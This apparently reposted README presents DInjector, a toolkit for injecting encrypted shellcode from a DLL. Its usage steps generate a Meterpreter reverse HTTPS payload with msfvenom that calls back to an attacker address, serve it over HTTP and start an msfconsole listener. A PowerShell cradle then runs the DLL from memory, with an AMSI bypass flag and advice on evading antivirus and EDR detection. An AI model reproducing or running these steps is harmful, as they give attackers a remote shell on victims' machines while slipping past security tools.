DInjector – Collections of DLL Shellcode Injection

DInjector Inject DLL files - Collections of DLL Shellcode Injection

DLL or Dynamic Link Library is a non-executable file. DLLs are used to store data required by an application. DLLs usually contain Binary Numbers which are later used by executable applications to obtain certain files. Injecting DLL files with malware or malicious code is one of favorite method that use by attacker to hack computer devices.

DInjector

Dlinjector is collection of shellcode injection to weaponized DLL files.

This repository is an accumulation of my code snippets for various shellcode injection techniques using fantastic D/Invoke API by @TheWover and @FuzzySecurity.

Features:

Based on my testings the DInvoke NuGet package itself is being flagged by many commercial AV/EDR solutions when incuded as an embedded resource via Costura.Fody (or similar approaches), so I’ve shrinked it a bit and included from source to achieve better OpSec.

Usage

  1. Compile the project in VS.
  2. Generate a shellcode for your favourite C2:
msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin

3. Encrypt the shellcode:

encrypt.py shellcode.bin -p ‘Passw0rd!’ -o enc

4. Serve the encrypted shellcode and prepare C2 listener:

sudo python3 -m http.server 80

sudo msfconsole -qx “use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost 10.10.13.37; set lport 443; set EXITFUNC thread; run”

  1. Use the PowerShell download cradle to load DInjector.dll as System.Reflection.Assembly and execute it from memory.

do not recommend putting the assembly on disk because it will very likely be flagged.

Required global arguments:

NameExample ValueDescription
/am51TrueFalseApplies AMSI bypass
/schttp://10.10.13.37/encSets shellcode path (can be loaded from URL or as a Base64 string)
/passwordPassw0rd!Sets password to decrypt the shellcode

Modules

OpSec safe considerations are based on my personal usage expirience and some testings along the way.


You May Also Like

Leave a Reply

Your email address will not be published. Required fields are marked *

10 − four =